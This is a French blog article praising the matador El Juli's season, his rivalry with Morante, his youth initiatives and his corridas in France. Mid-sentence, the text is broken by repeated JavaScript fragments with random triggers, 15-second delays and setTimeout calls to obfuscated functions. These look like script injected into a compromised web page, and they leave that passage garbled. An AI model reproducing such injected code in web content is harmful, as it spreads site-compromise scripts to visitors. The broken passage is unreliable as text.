EL JULI : SUR TOUS LES FRONTS

Nous n’entrerons pas dans la polémique en affirmant que El Juli est le meilleur torero de notre temps ou non, mais il est certain qu’il en est bien le leader. Leader dans les arènes et en dehors. Des trois premières ferias de la saison, à Olivenza, Valence et Castellón il est sorti triomphateur et surtout il s’est imposé dans des contextes complètement différents. Devant des toros âpres, où il a risqué sa vie, avec la sincérité de son toreo et sa technique prodigieuse et éblouissante, même aux yeux des toreros et des meilleurs aficionados, et face aux toros plus réceptifs il a fasciné par la profondeur que confèrent le temps et sa quête d’absolu. Mais il a aussi clairement affiché qu’il ne se débinera jamais devant aucun torero, aussi artiste soit-il, et qu’il les affrontera et les provoquera, comme ce fut le cas à Valence, avec un quite débordant d’orgueil devant Morante en personne qui fut à l’origine d’un des moments les plus sublimes de cette feria. Et avec cette même attitude, cette même ambition il envisage l’un des mano a mano les plus excitants de la temporada, celui avec le torero de La Puebla à Malaga. Car rien n’est écrit et le défi artistique est probablement ce qui motive le plus le torero madrilène. Techniquement il est pour tous les toreros un exemple et c’est surtout artistiquement qu’il a encore beaucoup de choses à dire et à asseoir définitivement.
El Juli est aussi un leader devant l’opinion, pour instruire et partager avec le grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and public les valeurs de la Fiesta. Mais pas uniquement à la télévision et dans la presse mais aussi dans les villes qu’il parcourt en dévoilant aux plus jeunes ce qu’est le toreo. Au sujet de la jeunesse,  son initiative « Eres torero » avec une chaîne de télévision est digne d’éloge, pour ne pas parler de sa propre école taurine qui donne de très bons résultats.
Pour El Juli il n’y a pas de frontières, il a fait une campagne américaine très fertile et en France, malgré les médisances de nombreux critiques taurins, il s’est engagé dans des corridas-événements comme celle de Nîmes avec les toros de Miura ou cette autre à Mont-de-Marsan avec du bétail de La Quinta.
Cette saison de El Juli a tous les ingrédients pour devenir l’un des sommets de sa carrière, pour le bien de la Tauromachie.

photos bruno Lasnier

juli002juli003

Les commentaires sont fermés.